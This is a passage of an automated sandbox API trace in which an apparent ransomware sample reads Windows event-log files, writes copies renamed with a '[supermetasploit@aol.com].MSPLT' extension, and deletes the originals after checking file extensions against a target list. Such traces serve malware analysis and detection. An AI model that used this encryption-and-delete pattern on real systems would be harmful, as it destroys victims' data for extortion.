dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.690] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0293.690] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0293.690] GetLastError () returned 0x0 [0293.690] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0293.928] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0293.930] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0293.931] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x12e, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x12e, lpOverlapped=0x0) returned 1 [0293.931] SetEndOfFile (hFile=0x47c) returned 1 [0294.307] CloseHandle (hObject=0x47c) returned 1 [0294.349] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.349] SetEndOfFile (hFile=0x488) returned 1 [0294.351] CloseHandle (hObject=0x488) returned 1 [0294.351] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.351] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 1 [0294.352] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.352] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.352] lstrlenW (lpString=".doc") returned 4 [0294.352] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.352] lstrlenW (lpString=".docx") returned 5 [0294.352] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.352] lstrlenW (lpString=".pdf") returned 4 [0294.352] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.352] lstrlenW (lpString=".xls") returned 4 [0294.353] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString=".xlsx") returned 5 [0294.353] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.353] lstrlenW (lpString=".ppt") returned 4 [0294.353] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.353] lstrlenW (lpString=".zip") returned 4 [0294.353] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString=".rar") returned 4 [0294.353] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString=".bz2") returned 4 [0294.353] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString=".7z") returned 3 [0294.353] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.353] lstrlenW (lpString=".dbf") returned 4 [0294.353] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.353] lstrlenW (lpString=".1cd") returned 4 [0294.353] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.353] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.353] lstrlenW (lpString=".jpg") returned 4 [0294.354] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.354] lstrlenW (lpString=".doc") returned 4 [0294.354] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".docx") returned 5 [0294.354] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.354] lstrlenW (lpString=".pdf") returned 4 [0294.354] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".xls") returned 4 [0294.354] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".xlsx") returned 5 [0294.354] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.354] lstrlenW (lpString=".ppt") returned 4 [0294.354] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.354] lstrlenW (lpString=".zip") returned 4 [0294.354] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".rar") returned 4 [0294.354] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".bz2") returned 4 [0294.354] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.354] lstrlenW (lpString=".7z") returned 3 [0294.354] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.354] lstrlenW (lpString=".dbf") returned 4 [0294.354] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.355] lstrlenW (lpString=".1cd") returned 4 [0294.355] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned 53 [0294.355] lstrlenW (lpString=".jpg") returned 4 [0294.355] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.355] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.355] lstrlenW (lpString="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 72 [0294.355] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.356] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0294.356] CloseHandle (hObject=0x488) returned 1 [0294.356] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 0x20 [0294.356] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.356] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.356] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.356] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.356] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0294.357] GetLastError () returned 0x0 [0294.357] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.363] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.366] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0294.367] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x164, lpOverlapped=0x0) returned 1 [0294.692] SetEndOfFile (hFile=0x47c) returned 1 [0294.693] CloseHandle (hObject=0x47c) returned 1 [0294.702] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.702] SetEndOfFile (hFile=0x488) returned 1 [0294.705] CloseHandle (hObject=0x488) returned 1 [0294.705] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.705] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 1 [0294.711] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.711] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.711] lstrlenW (lpString=".doc") returned 4 [0294.711] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.711] lstrlenW (lpString=".docx") returned 5 [0294.711] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.711] lstrlenW (lpString=".pdf") returned 4 [0294.711] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.711] lstrlenW (lpString=".xls") returned 4 [0294.711] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.711] lstrlenW (lpString=".xlsx") returned 5 [0294.711] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.711] lstrlenW (lpString=".ppt") returned 4 [0294.711] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.711] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.711] lstrlenW (lpString=".zip") returned 4 [0294.711] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.711] lstrlenW (lpString=".rar") returned 4 [0294.711] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString=".bz2") returned 4 [0294.712] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString=".7z") returned 3 [0294.712] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.712] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.712] lstrlenW (lpString=".dbf") returned 4 [0294.712] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.712] lstrlenW (lpString=".1cd") returned 4 [0294.712] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.712] lstrlenW (lpString=".jpg") returned 4 [0294.712] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.712] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.712] lstrlenW (lpString=".doc") returned 4 [0294.712] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString=".docx") returned 5 [0294.712] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.712] lstrlenW (lpString=".pdf") returned 4 [0294.712] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString=".xls") returned 4 [0294.712] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.712] lstrlenW (lpString=".xlsx") returned 5 [0294.712] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.713] lstrlenW (lpString=".ppt") returned 4 [0294.713] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.713] lstrlenW (lpString=".zip") returned 4 [0294.713] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString=".rar") returned 4 [0294.713] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString=".bz2") returned 4 [0294.713] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString=".7z") returned 3 [0294.713] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.713] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.713] lstrlenW (lpString=".dbf") returned 4 [0294.713] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.713] lstrlenW (lpString=".1cd") returned 4 [0294.713] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.713] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 80 [0294.713] lstrlenW (lpString=".jpg") returned 4 [0294.713] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.713] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.714] lstrlenW (lpString="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 57 [0294.714] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.715] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0294.715] CloseHandle (hObject=0x488) returned 1 [0294.715] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 0x20 [0294.716] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.716] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.716] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.716] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.716] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0294.719] GetLastError () returned 0x0 [0294.719] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.725] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.728] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0294.728] WriteFile (in: hFile=0x47c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x146, lpOverlapped=0x0) returned 1 [0294.728] SetEndOfFile (hFile=0x47c) returned 1 [0294.729] CloseHandle (hObject=0x47c) returned 1 [0294.732] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.732] SetEndOfFile (hFile=0x488) returned 1 [0294.733] CloseHandle (hObject=0x488) returned 1 [0294.734] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.734] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx")) returned 1 [0294.734] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.735] lstrlenW (lpString=".doc") returned 4 [0294.735] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".docx") returned 5 [0294.735] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.735] lstrlenW (lpString=".pdf") returned 4 [0294.735] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".xls") returned 4 [0294.735] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".xlsx") returned 5 [0294.735] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.735] lstrlenW (lpString=".ppt") returned 4 [0294.735] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.735] lstrlenW (lpString=".zip") returned 4 [0294.735] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".rar") returned 4 [0294.735] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".bz2") returned 4 [0294.735] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.735] lstrlenW (lpString=".7z") returned 3 [0294.735] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.735] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.735] lstrlenW (lpString=".dbf") returned 4 [0294.736] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.736] lstrlenW (lpString=".1cd") returned 4 [0294.736] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.736] lstrlenW (lpString=".jpg") returned 4 [0294.736] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.736] lstrlenW (lpString=".doc") returned 4 [0294.736] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString=".docx") returned 5 [0294.736] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.736] lstrlenW (lpString=".pdf") returned 4 [0294.736] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString=".xls") returned 4 [0294.736] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString=".xlsx") returned 5 [0294.736] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.736] lstrlenW (lpString=".ppt") returned 4 [0294.736] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.736] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.736] lstrlenW (lpString=".zip") returned 4 [0294.737] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.737] lstrlenW (lpString=".rar") returned 4 [0294.737] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.737] lstrlenW (lpString=".bz2") returned 4 [0294.737] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.737] lstrlenW (lpString=".7z") returned 3 [0294.737] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.737] lstrlenW (lpString=".dbf") returned 4 [0294.737] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.737] lstrlenW (lpString=".1cd") returned 4 [0294.737] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.737] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 65 [0294.737] lstrlenW (lpString=".jpg") returned 4 [0294.737] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.737] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.737] lstrlenW (lpString="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 42 [0294.737] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.738] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0294.738] CloseHandle (hObject=0x488) returned 1 [0294.738] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx")) returned 0x20 [0294.738] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.738] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0294.739] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.739] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0294.739] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0295.109] GetLastError () returned 0x0 [0295.109] ReadFile (in: hFile=0x488, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.143] WriteFile (in: hFile=0x46c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.145] 